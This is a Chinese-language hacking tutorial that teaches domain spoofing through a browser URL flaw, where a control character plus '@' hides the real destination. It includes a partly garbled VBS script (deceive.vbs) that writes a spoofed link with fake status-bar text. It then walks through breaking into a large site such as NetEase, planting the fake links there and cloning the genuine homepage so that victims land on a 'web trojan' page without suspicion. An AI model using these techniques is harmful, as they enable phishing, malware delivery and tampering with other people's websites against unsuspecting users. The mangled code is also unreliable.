網(wǎng)頁(yè)木馬種植方案一直都存在很大的問(wèn)題，當(dāng)然欺騙需要技巧也需要時(shí)間，我們現(xiàn)在不需要那么麻煩的欺騙,本文就是教大家利用最新瀏覽器漏洞實(shí)現(xiàn)域名的欺騙.....
前言
域名欺騙有多種實(shí)現(xiàn)方法，本文所說(shuō)的是利用客戶端瀏覽器的漏洞來(lái)欺騙用戶 。
多數(shù)瀏覽器都會(huì)存在這個(gè)漏洞，目前暫時(shí)還沒(méi)相應(yīng)的補(bǔ)丁 。漏洞是這樣的：
當(dāng)用戶通過(guò)瀏覽器訪問(wèn)一個(gè)url,如果這個(gè)url是經(jīng)過(guò)以下的格式構(gòu)造的，那么瀏覽器實(shí)際將訪問(wèn)經(jīng)過(guò)構(gòu)造的惡意頁(yè)面,而用戶瀏覽器的地址欄里所顯示的將是虛假的url：
url的構(gòu)造格式為：
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
說(shuō)明：
url_1為用戶所看到的地址，地址中不可以帶/
special_char為一個(gè)特殊的字符，即ascii碼為1的字符
url_2為惡意頁(yè)面地址
利用過(guò)程
首先請(qǐng)看這個(gè)測(cè)試頁(yè)面：

域名欺騙技術(shù)實(shí)例

你可以看看這兩個(gè)鏈接有什么區(qū)別:

鏈接1:
鏈接2:www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>www.163.com


這個(gè)網(wǎng)頁(yè)源代碼，其中鏈接1指向了一個(gè)vbs腳本，而鏈接2指向的是163站點(diǎn) 。如果我們把連接一的vbs腳本改成下列代碼：
""""""""""""""""""""""""""""""""""""""deceive.vbs"""""""""""""""""""""""""""""""""""""""""""""
"（以下請(qǐng)根據(jù)實(shí)際情況自行修改：）
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status="_blank ?>http://;&url1&dn&"
mouseout=onmouseout=javascript :window.status=""
click=onclick=javascript :navigate("&url&")
style=style=cursor:hand
tag=&text&
document.write tag
"說(shuō)明：
"url1是用來(lái)欺騙用戶的地址.
"url2是實(shí)際訪問(wèn)的地址，可以是網(wǎng)頁(yè)木馬、惡意網(wǎng)頁(yè)等.
"text是鏈接的文字.
"注意：(以上欺騙地址及實(shí)際地址不可以加http://)
"""""""""""""""""""""""""""""""""""""""cuts here""""""""""""""""""""""""""""""""""""""""""""""""
現(xiàn)在大家看到了吧~~當(dāng)我們點(diǎn)擊這個(gè)測(cè)試頁(yè)面的時(shí)候，鏈接1指向的是google.com，而且狀態(tài)欄和地址欄里都顯示_blank>http://www.163.com/，鏈接2卻指向163.com 。你也許感到不可思議，但這就是域名欺騙漏洞的魅力 。
我們可以想象，如果以上的測(cè)試頁(yè)面中的鏈接1指向的不是google.com，而是我們的網(wǎng)頁(yè)木馬，那就......
不過(guò)，一個(gè)普通的個(gè)人網(wǎng)站沒(méi)人會(huì)看的，這就需要我們把這種假鏈接添加到別的大網(wǎng)站的頁(yè)面之中 。假設(shè)我們?nèi)肭至艘粋€(gè)比較大的網(wǎng)站，比如網(wǎng)易（哇~~~~~~這時(shí)候一只菜鳥推著一車磚頭，看著我......） 。這時(shí)候就可以把它的頁(yè)面給改了 。
比如有一個(gè)文字鏈接，我們就可以把代碼中的xxxxxx改為我們自己的代碼： ?？吹絪rc屬性里的deceive.vbs了嗎 ？我們要編輯好這個(gè)文件，然后上傳到要修改的頁(yè)面目錄下 。
這樣還不行，我們還要把自己的木馬網(wǎng)頁(yè)的界面修改一下 。也就是把原來(lái)鏈接到的頁(yè)面加入到我們自己的木馬網(wǎng)頁(yè)，并且我們的木馬網(wǎng)頁(yè)里的所有鏈接等內(nèi)容要和原來(lái)的頁(yè)面一樣，否則就會(huì)引起用戶的懷疑 ?，F(xiàn)在，我們把google網(wǎng)站的首頁(yè)源代碼全部復(fù)制下來(lái)，添加到我們的網(wǎng)頁(yè)木馬 。把復(fù)制下來(lái)的代碼中的圖片或者是鏈接的文件都修改完整，比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif，否則網(wǎng)頁(yè)就和原來(lái)的不一樣了（圖片顯示為紅色的×，鏈接也失效），因?yàn)橛脩舸蜷_的是你的站點(diǎn)，而你的站點(diǎn)中并沒(méi)有l(wèi)ogo.gif 。都修改好后就可以保存文件了 。上傳到你的網(wǎng)頁(yè)空間里 。

推薦閱讀

• 

  屈原是什么樣的一個(gè)人
• 

  筆記本電腦的亮度怎么調(diào)節(jié)
• 

  男性風(fēng)濕病早期的癥狀 男性風(fēng)濕病早期的癥狀表現(xiàn)
• 

  微信全年總支出從哪里看 微信全年支出在哪里看
• 

  長(zhǎng)江三峽是哪三峽
• 

  天地劫越級(jí)機(jī)制分析怎么樣 天地劫越級(jí)機(jī)制分析
• 

  籃球初學(xué)者如何針對(duì)性地訓(xùn)練
• 

  懷孕三個(gè)月的孕婦能吃薺菜野菜嗎
• 

  如何炒股賺錢 炒股能賺錢嗎
• 

  不用機(jī)頂盒怎么看電視直播
• 

  有沒(méi)刮胡子怎么辦
• 

  火花塞多久換一次，機(jī)濾多長(zhǎng)時(shí)間換一次
• 

  為什么沒(méi)人推薦長(zhǎng)城電源,長(zhǎng)城電源電容風(fēng)扇用料從國(guó)產(chǎn)換到臺(tái)系
• 

  安徽中考時(shí)間2021具體時(shí)間，安徽省中考分?jǐn)?shù)什么時(shí)候下來(lái)怎么查詢啊
• 

  揭陽(yáng)到蓬萊飛機(jī)票多少錢，天水到西安的飛機(jī)票是多少錢
• 

  開票必須走公賬嗎

• 反病毒技巧：六個(gè)步驟即可防范ARP地址欺騙類病毒
• 納米技術(shù)的資料有哪些
• 專家給出雜草科學(xué)防除技術(shù)方案
• 魅族相機(jī)相關(guān)技術(shù)12月13日公布 與魅族17有關(guān)
• 安全導(dǎo)航：認(rèn)識(shí)反網(wǎng)絡(luò)釣魚欺騙新技術(shù)
• 建筑施工技術(shù)規(guī)范包括哪些 建筑施工技術(shù)規(guī)范到底包括哪些
• 解析cookie欺騙實(shí)現(xiàn)過(guò)程及具體應(yīng)用
• 交換環(huán)境下SNIFFER的幾種攻擊技術(shù)手段
• 蛇要養(yǎng)多久才能賣
• 油菜早春防寒防凍技術(shù)